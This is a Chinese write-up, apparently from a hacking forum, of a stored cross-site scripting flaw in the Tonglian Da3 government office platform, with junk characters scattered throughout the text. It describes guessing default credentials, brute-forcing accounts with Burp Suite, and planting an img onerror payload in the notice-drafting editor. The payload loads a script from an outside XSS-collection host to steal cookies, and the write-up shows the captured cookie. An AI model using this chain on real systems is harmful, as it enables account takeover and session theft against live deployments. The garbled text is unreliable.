' q) g! p, g, n% f% Z2 E 1 G/ p7 B. K% e7 ~9 o2 l
同联Da3协同办公平台后台通用储存型xss漏洞) [5 f! m8 \. B
* C3 J7 i; P$ Z7 y7 O; V3 N- t
7 d5 |# h5 Z$ u v1 \, }* ?3 c 平台简介:3 k6 r9 J$ \2 z2 o" a4 P1 S$ ?
. O, ?4 ^; r+ m3 I
: D& t6 D) c& u
% ?# h0 b; N+ p# A; i4 n
; w; M7 V. \2 n! b8 |' D5 @ Z- Z
& S/ O8 d8 q. c" y: y0 j 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
~* s& [% F/ q' I4 J7 O
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* {' @6 t, j/ j* c; D9 V1 a/ W
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!: |( j# R" M) h* U7 X2 n9 |" r
K! s4 b/ v; Q9 L9 `8 A! ?) W B
* m) o' C' C0 {
, M% R3 V0 J8 _
0 m7 S; ~* B! e4 k* K$ P
- _* J) |. L* |' w/ l' ]( n 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:# T) P* A5 a3 q4 j" D/ w5 g' E, L
9 u' |. J; x8 a: j$ X* V, E* I8 }
" u+ h$ |3 a7 ]6 N; n : q. J0 h/ i' g- o/ |
0 P, a! B3 I6 H" A, k( P & q* B, \) [ _+ _6 k
http://1.1.1.1:7197/cap-aco/#(案例2-)
! x6 d: p& k+ l6 O* r
, H9 g" h. W, C4 [& p
! T$ H! S# s. q) d4 h http://www.XXOO.com (案例1-官网网站)7 s. N% w- j. m; A
9 b2 p* p' o" F5 a' I# j
; I/ x7 i& E. A! [- s" n 漏洞详情:% Z0 y& h. L+ P, H
2 A+ Z/ [9 l; x4 E7 f
# B0 {4 r, p) F# H
案例一、3 w# c* K* o/ n
0 u8 ^- h0 l" Q4 j5 t# h7 u
) R L3 ?1 S$ p7 c6 a4 o 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试8 h9 Z; V( r" _- T. Y
# r+ u5 Z3 G5 S$ g: [- r9 h 2 W% h! y/ ?& g0 {9 H- X
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:' C+ \) Q* m' f% L* i2 I
. D4 |6 ]" [- h) r7 H- O! O, g
5 l; M5 N( L, ?% x3 m( i/ N& ^: U
# |5 o" S6 E% U9 E! z0 S
% X5 V; j% ]& k. O. [8 L. f% R' S
- g. B/ W: N9 H& i& S 
`! n2 s b& C# H, k% ]
8 t3 n5 v+ p! I$ b3 U0 o
! E& M0 O9 t( {) u7 W& J4 f status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
; k# K) P7 V$ ?/ }: v5 z
3 }8 z `! o" r! `
* s, d1 t: ?$ x3 U4 e A } 6 G9 z, S+ t+ _& A
% n5 }4 c+ N1 j$ E1 _3 n }
- F. ?2 B/ J6 s9 o# i
4 X$ w' I& v/ Y3 G
1 @+ u$ G6 b* u" R! N0 `
, c: Z. A8 g( q, h7 P 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 . ^& z/ ]1 k6 T* k' R8 ]
' a2 m3 A. x6 @( r N
7 N, n3 z5 ]( l+ H; D 2 R& a/ ^" |8 I# {- k/ s: u" V4 Z
* |9 U/ v; K% T% R3 X
7 z' ~1 i$ Q0 L1 v1 @0 W/ Q <img src=x$ Y- V) d( b# ~% H6 Q; w
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
7 N4 N$ E' D, J! z
: U4 A8 @) t2 J
. M0 y- I0 g+ l0 q* p5 ]' W
4 y! m! k3 x! e5 T% W* [9 H# n* ?
: G% z" w, x" v: O0 U- x
- `) f) u- x: s4 \ 然后发送,接收cookie如图: , z$ J; _1 p3 h: S0 x3 ~- a# A9 t
$ c1 t" \: i* t% G6 J, P
- r* [9 Y/ i; q. B' j' i& \/ x8 h
0 ^& s. [3 e* i6 x: e8 |
9 L9 [! n6 Q5 r! e
' Q" @0 S4 x( ~' Y p! [2 W
) x% h: o0 m( W0 ]! V
5 }% _3 }! ]1 { S& |
; s& W" L4 ~; V7 i5 {0 W9 Z ' d4 R; O: [; \$ x/ s
5 o6 W$ e$ D1 V( H; }8 n
3 B. A# E3 t7 |" B2 w' Q : J; G6 J# `/ b
/ K+ f2 J# L7 N1 s4 K
2 f6 O, [) i) y' m* R 
3 b2 d7 Z5 J8 w1 f* H; K: [7 N
5 T$ P" K7 p1 F: U2 k; k: y 7 w' h/ n; {# f w# M
! F! D0 C: d8 y4 d8 I
* I! t6 E! b1 Z
3 C j0 f6 B7 v0 n8 F
3 m: k& z# q' k& W! h
7 v, d9 r H" O& G7 W
& R( |/ z8 Z$ A) {1 I( U 案例2、 : ?/ r: p' i* |/ ^
+ k! C$ {6 f) c# o* J) W" ]& l
- M. x$ C3 |5 M* M 前面步骤都一样,下面看效果图: 2 |7 f* d8 O& R6 |6 U8 ~, b9 I
( x6 G5 K5 ~0 o, c) a , O) K4 b, p* Y2 v* N
: s+ ?* y) v! e2 w. a1 A2 ~- V9 G& a
& W- G% g9 M: Z8 z* f" K
/ E ^5 j8 ^1 C3 a4 l4 Q# P 
9 n4 q' ^# \$ z6 k, r: d0 Q5 Y
9 q2 M+ _0 @( J
4 w L* m2 N5 Z- R. x
" k* H5 k3 d. l
5 E7 b& J4 Q4 F4 h
/ j5 i: [* n A, G% Z7 j
6 a' a, U O8 t, p {
- K7 x' }4 P$ L1 a# i
! ^* p+ B0 n s 
" l s) N& J$ @6 |2 E
d. ~% X6 X! ?" `3 e9 i; t
) H( Q9 C) a( w; Q; n
) O3 p5 h- }" s( u3 N
/ Q3 ] w1 @' f5 L" ]- I( r % f2 [+ e4 F+ @. _; G: F
- {" J9 ?: t" Z4 ^( \7 [
3 z) K. G$ W0 B( m; M 5 n. A( A% p2 B0 `" V4 n" u+ ^2 h$ S
e5 P4 C! J+ W d2 O# [9 M
4 P2 [3 ^1 C y6 ^) b
5 T1 R" Q/ R, @/ t9 e i4 f3 a' X
: Q2 w8 ^! |# _) o" o
2 Z, c8 S3 ^8 n6 Q